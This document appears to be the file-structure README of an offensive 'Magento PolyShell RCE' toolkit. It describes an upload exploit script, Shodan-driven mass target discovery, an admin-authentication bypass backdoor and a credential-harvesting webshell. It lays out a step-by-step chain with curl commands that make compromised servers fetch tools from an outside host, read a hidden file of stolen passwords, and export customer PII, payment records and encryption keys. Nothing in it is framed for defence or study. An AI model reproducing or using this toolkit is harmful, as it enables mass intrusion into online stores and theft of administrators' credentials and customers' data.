Complete file structure and purpose for the Magento PolyShell RCE toolkit.
Magento-Polyshell-RCE/
βββ main.py # Main exploitation script (45+ extensions)
βββ grabs.py # Automated credential grabber deployment
βββ admin.php # Magento admin panel access tool
βββ grab.php # Credential harvester webshell
βββ adminer.php # Database management interface
βββ requirements.txt # Python dependencies
βββ README.md # Main documentation
βββ banner.png # Tool banner image
βββ at.png # Attack vector screenshot
βββ val.png # RCE validation screenshot
Purpose: Primary exploitation tool for PolyShell RCE
Features:
- 45+ PHP extension testing (.php., .phar., .phtml., etc.)
- Multi-mode support (RCE/XSS/Both)
- Multi-header polyglots (PNG/GIF89a/GIF87a)
- Random/Fixed filename modes
- Server fingerprinting (AWS S3, GCS, Nginx, Apache, Cloudflare)
- WAF bypass headers (15+ bypass techniques)
- Threaded uploads (configurable 1-100)
- SessionReaper-style result grouping
Usage:
# Interactive mode
python main.py
# CLI mode
python main.py -t targets.txt -m rce -H png -f shellOutput:
PolyShell_Results_{timestamp}/
βββ polyshell_results.txt # Grouped results by target
βββ RCE.txt # curl-ready commands
Purpose: Shodan & Google Dorks scanner for finding Magento stores
Features:
- Shodan API integration (30+ Magento-specific queries)
- Google Dorks support for additional reconnaissance
- Multi-threaded scanning (queue-based workers)
- Proxy support (SOCKS5/HTTP) with rotation
- Auto-filters staging/dev/cloud domains
- Date range queries (splits large results into 30-day chunks)
- Deduplication (prevents duplicate domains/IPs)
- Exports to organized lists (hosts.txt, ips.txt)
Shodan Queries (30+):
- "X-Magento-Cache-Control"
- http.component:"Magento"
- http.html:"Mage.Cookies"
- http.html:"skin/frontend/default"
- "Magento/2.4"
- "Magento/2.3"
- http.html:"/customer/address_file/upload"
- "Adobe Commerce"
Usage:
python grabs.py
# Prompts:
# 1. With Proxy or No Proxy (1=Yes, 2=No)
# 2. [If proxy] Enter proxy list path (proxy.txt)Output:
Magento_Targets_{timestamp}/
βββ hosts.txt # Domain names only (cleaned, no staging/cloud)
βββ ips.txt # IP addresses only
Auto-Filtered Domains:
- Staging/dev/test environments
- Cloud providers (AWS, GCP, Azure, DigitalOcean, etc.)
- Hosting provider domains (.clients., .server., .vps.)
- Internal/localhost domains
Purpose: Magento admin panel access tool
Features:
- Bypass admin authentication
- Session hijacking capabilities
- Direct admin panel access via backdoor
- Cookie/token manipulation
Deployment:
# Via main.py RCE
curl 'https://target.com/.../shell.php.?cmd=wget+https://raw.githubusercontent.com/khadafigans/Magento-Polyshell-RCE/main/admin.php'
# Access
https://target.com/media/admin.phpUse Cases:
- Post-exploitation admin access
- Order manipulation
- Customer data extraction
- Persistent backdoor maintenance
Purpose: Credential harvesting webshell
Features:
- Logs Magento admin login attempts
- Captures username + password + IP + timestamp
- Stores credentials in hidden log file
- Transparent proxy (doesn't break site functionality)
Deployment:
# Via main.py
python main.py -t target.txt -m rce -H png -f grab
# Or via grabs.py
python grabs.pyAccess Logs:
# Via RCE shell
curl 'https://target.com/.../shell.php.?cmd=cat+/tmp/.grabs.log'Log Format:
[2026-03-26 14:30:22] IP: 192.168.1.100 | User: admin | Pass: Admin@123
[2026-03-26 15:45:11] IP: 10.0.0.50 | User: support | Pass: Support2024!
Purpose: Lightweight database management interface (Adminer 4.x)
Features:
- Full MySQL/MariaDB access
- Execute SQL queries
- Export/import databases
- Browse tables and edit records
- No installation required (single PHP file)
Deployment:
# Via RCE
curl 'https://target.com/.../shell.php.?cmd=wget+https://raw.githubusercontent.com/khadafigans/Magento-Polyshell-RCE/main/adminer.php+-O+/var/www/html/media/db.php'
# Access
https://target.com/media/db.phpUse Cases:
- Extract Magento admin_user table
- Dump customer data (sales_order, customer_entity)
- Modify product prices
- Inject malicious JavaScript (stored XSS)
Connection Details:
Server: localhost
Username: [from env.php]
Password: [from env.php]
Database: magento
Purpose: Python dependencies for main.py and grabs.py
Contents:
requests>=2.28.0
urllib3>=1.26.0
Installation:
pip install -r requirements.txtPurpose: Tool banner/logo for README
- Displays PolyShell branding
- Shows CVE information
- Tool version and author
Purpose: Attack vector visualization
- Illustrates GraphQL β REST API β File Upload β RCE flow
- Shows polyglot structure (PNG header + PHP payload)
Purpose: RCE validation proof
- Terminal screenshot showing successful exploitation
- Displays
whoamiandidoutput - Proves genuine command execution (not false positive)
Python 3.7+
βββ requests (HTTP client)
βββ urllib3 (Connection pooling)
βββ json (Payload construction)
βββ base64 (Polyglot encoding)
βββ concurrent.futures (Threading)
βββ argparse (CLI arguments)
Python 3.7+
βββ requests
βββ grab.php (uploaded via HTTP)
βββ main.py (optional - for initial RCE)
PHP 7.0+
βββ admin.php requires:
β βββ curl
β βββ json
βββ grab.php requires:
β βββ file_put_contents
β βββ date
βββ adminer.php requires:
βββ mysqli/pdo_mysql
βββ session
1. Initial Exploitation
ββ python main.py -t targets.txt -m rce -H png -f shell
ββ Output: RCE shells (.php., .phar., .phtml.)
2. Credential Harvesting
ββ python grabs.py
ββ Deploys grab.php
ββ Output: credentials.txt
3. Admin Access
ββ Upload admin.php via RCE
ββ Access: https://target.com/media/admin.php
ββ Result: Full admin panel access
4. Database Access
ββ Upload adminer.php via RCE
ββ Access: https://target.com/media/db.php
ββ Result: Direct MySQL access
5. Data Exfiltration
ββ Use adminer.php to export:
ββ admin_user (admin credentials)
ββ customer_entity (PII)
ββ sales_order (payment info)
ββ core_config_data (encryption keys)
PolyShell_Results_20260326_143022/
βββ polyshell_results.txt
β βββ Target URLs
β βββ Working extensions
β βββ Shell URLs
β βββ RCE validation output
β βββ Server fingerprint
β
βββ RCE.txt
βββ curl commands (copy-paste ready)
βββ whoami tests
βββ id tests
Grabs_Results_20260326_150033/
βββ credentials.txt
βββ Admin usernames
βββ Admin passwords
βββ IP addresses
βββ Timestamps
/var/www/html/pub/media/custom_options/quote/
βββ b/o/shell.php. # RCE shell
βββ b/o/shell.phar. # RCE shell (alternative)
βββ g/r/grab.php. # Credential harvester
βββ a/d/admin.php. # Admin access backdoor
βββ d/b/db.php. # Adminer interface
| File | Size | Description |
|---|---|---|
| main.py | ~45 KB | Main exploitation script |
| grabs.py | ~28 KB | Credential grabber deployment |
| admin.php | ~22 KB | Admin panel backdoor |
| grab.php | ~18 KB | Credential harvester |
| adminer.php | ~470 KB | Database management (full Adminer) |
| requirements.txt | ~30 bytes | Python dependencies |
| banner.png | ~120 KB | Tool banner image |
| at.png | ~85 KB | Attack vector diagram |
| val.png | ~95 KB | RCE validation screenshot |
Total Repository Size: ~900 KB
# Clone repository
git clone https://github.com/khadafigans/Magento-Polyshell-RCE.git
cd Magento-Polyshell-RCE
# Install dependencies
pip install -r requirements.txt
# Run main exploitation
python main.py -t targets.txt -m rce -H png -f shell
# Deploy credential grabber
python grabs.py
# Upload additional tools via RCE
curl 'https://target.com/.../shell.php.?cmd=wget+https://raw.githubusercontent.com/khadafigans/Magento-Polyshell-RCE/main/admin.php'# Main script
https://raw.githubusercontent.com/khadafigans/Magento-Polyshell-RCE/main/main.py
# PHP tools
https://raw.githubusercontent.com/khadafigans/Magento-Polyshell-RCE/main/admin.php
https://raw.githubusercontent.com/khadafigans/Magento-Polyshell-RCE/main/grab.php
https://raw.githubusercontent.com/khadafigans/Magento-Polyshell-RCE/main/adminer.php
# Supporting files
https://raw.githubusercontent.com/khadafigans/Magento-Polyshell-RCE/main/requirements.txt
Β© 2026 khadafigans | Bob Marley Security Labs